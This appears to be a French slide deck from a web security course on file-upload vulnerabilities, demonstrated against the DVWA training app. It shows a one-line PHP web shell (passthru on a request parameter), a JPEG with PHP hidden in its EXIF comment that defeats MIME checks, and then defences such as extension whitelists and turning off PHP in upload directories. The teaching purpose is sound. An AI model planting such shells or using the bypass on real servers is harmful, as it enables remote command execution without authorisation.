# upload


## Upload de fichier

* Risque
  * Upload de code arbitraire
    * Backdoor ou Remote shell

* Deux problèmes
  * filtrage des types de fichiers uploadés
  * exposition / exécution des scripts au niveau du répertoire d'upload


## Upload de fichier

* Configurations liées à l'upload à différents endroits
  * HTML (côté client)
  * PHP (moteur de script)
  * Apache (serveur web)

* Ergonomiquement intéressant pour l'utilisateur
  * [elFinder](http://elfinder.org) ...
    * [et leurs problèmes de sécurité](https://github.com/Studio-42/elFinder/issues/815)

Note:
- MIME Multipurpose Internet Mail Extensions
  - pour que les clients mail puissent afficher correctement les PJ
- pas d'upload ... FTP, WebDav (utilise les verbs HTTP)


### [security low](http://dv.wa/vulnerabilities/upload/)

Upload d'un fichier bd.php simple

```php
echo passthru($_REQUEST['cmd'])
```

```php
print_r($&lowbar;FILES);
/*
 * ici 2 fichiers uploadés
 */
array(1) {
    ["uploaded"]=>array(2) {
        ["name"]=>array(2) {
            [0]=>string(9)"file0.txt"
            [1]=>string(9)"file1.txt"
        }
        ["type"]=>array(2) {
            [0]=>string(10)"text/plain"
            [1]=>string(10)"text/html"
        }
    }
}
```


### [security low](http://dv.wa/vulnerabilities/upload/)

* Trouver le répertoire d'upload
  * chemins connus dans produits connus
  * code source HTML faisant référence au fichier uploadé

[http://dv.wa/hackable/uploads/bd.php](http://dv.wa/hackable/uploads/bd.php)


### [security medium](http://dv.wa/vulnerabilities/upload/)

```php
$_FILES['uploaded']['type']
```

* Filtrer par type mime
  * déduit de l'entête HTTP *Content-Type* de la requête HTTP envoyant le fichier
    * fakable

  * [mime_content_type](http://php.net/manual/fr/function.mime-content-type.php)
  * [exif_imagetype](http://php.net/manual/fr/function.exif-imagetype.php)
  * [finfo_file](http://php.net/manual/fr/function.finfo-file.php)
  * [getimagesize](http://php.net/manual/fr/function.getimagesize.php)


### [security medium](http://dv.wa/vulnerabilities/upload/)

bd.php

```php
echo passthru($_REQUEST['cmd'])
```

| Command                     | Output             |   
| --------------------------- |:------------------:|
| $_FILES['uploaded']['type'] | application/x-php  |   
| mime_content_type           | text/x-php         |   
| exif_imagetype              | null (no image)    |
| finfo_file                  | text/x-php         |
| getimagesize[2]             | null (no image)    |
<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->


### [security medium](http://dv.wa/vulnerabilities/upload/)

<small style="float: left">[lego.jpeg](images/upload/lego.jpeg)</small>

[![lego](images/upload/lego.jpeg "lego")<!-- .element style="width: 50px" -->](images/upload/lego.jpeg)

| Command                     | Output             |
| --------------------------- |:------------------:|
| $_FILES['uploaded']['type'] | image/jpeg         |
| mime_content_type           | image/jpeg         |
| exif_imagetype              | 2 (IMAGETYPE_JPEG) |
| finfo_file                  | image/jpeg         |
| getimagesize[2]             | image/jpeg         |
<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->


### [security medium](http://dv.wa/vulnerabilities/upload/)

* [kitten.jpg.php](images/upload/kitten.jpg.php)

![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 250px" -->

* visionner le "Comment" du jpg avec [exiftool](http://www.sno.phy.queensu.ca/~phil/exiftool/) + [<i class="fa fa-gift"></i>](http://www.gamergen.com/actualites/insolites-hacker-arrete-pour-poitrine-copine-93809-1)


### [security medium](http://dv.wa/vulnerabilities/upload/)

<small style="float: left">[kitten.jpg.php](images/upload/kitten.jpg.php)</small>

![kitten](images/upload/kitten.jpg "kitten")<!-- .element style="width: 50px" -->

| Command                     | Output             |
| --------------------------- |:------------------:|
| $_FILES['uploaded']['type'] | application/x-php  |
| mime_content_type           | image/jpeg         |
| exif_imagetype              | 2 (IMAGETYPE_JPEG) |
| finfo_file                  | image/jpeg         |
| getimagesize[2]             | null (no image)    |
<!-- .element class="table-striped table-bordered table-hover" style="width: 100%" -->

Note:
- le .php est indispensable pour exécuter la charge dans la commentaire de l'image
- parler d'exif -> cf le lien la géoloc (sur fb, etc ...)
- On pourrait également avoir une image malicieuse vouée à infecter le client
  - autre hisoitre
    - difficilement détectable à l'upload


## <i class="fa fa-medkit"></i> Se préserver

* Filtrer par extension de fichier plutôt que par type MIME
  * utiliser des listes blanches plutôt que des listes noires
  * un nom de fichier peut contenir des points
    * il faut bien prendre l'extension
  * c'est ce qui est fait avec [security high](http://dv.wa/vulnerabilities/upload/)


## <i class="fa fa-medkit"></i> Se préserver

désactiver php dans le répertoire d'upload

#### via le vhost ou .htaccess

```xml
php_admin_value engine Off
```

Note:
- MIME Multipurpose Internet Mail Extensions : pour que les clients mail puissent afficher correctement les PJ


## <i class="fa fa-medkit"></i> Se préserver

* Ne plus servir le répertoire d'upload via apache
  * sortir le répertoire d'upload du dossier servi par apache
  * en interdire la lecture avec un htaccess renvoyant une 403 Forbidden

#### via le vhost ou .htaccess

```
order deny, allow
deny from all
```


## <i class="fa fa-medkit"></i> Se préserver

* Utiliser PHP pour lire les fichier avec [readfile](http://php.net/manual/fr/function.readfile.php)
  * prendre en charge la génération des en-têtes **Content-Type** "manuellement"
    * [download center lite](http://www.stadtaus.com/fr/php_scripts/download_center_lite/)
      * permet une meilleure gestion des accès par permission
        * accès à la session courante
    * [<i class="fa fa-github"></i> igorw/IgorwFileServeBundle](https://github.com/igorw/IgorwFileServeBundle)

Note:
- attention toute la stack Sf2 à chaque image ou asset c'est chaud
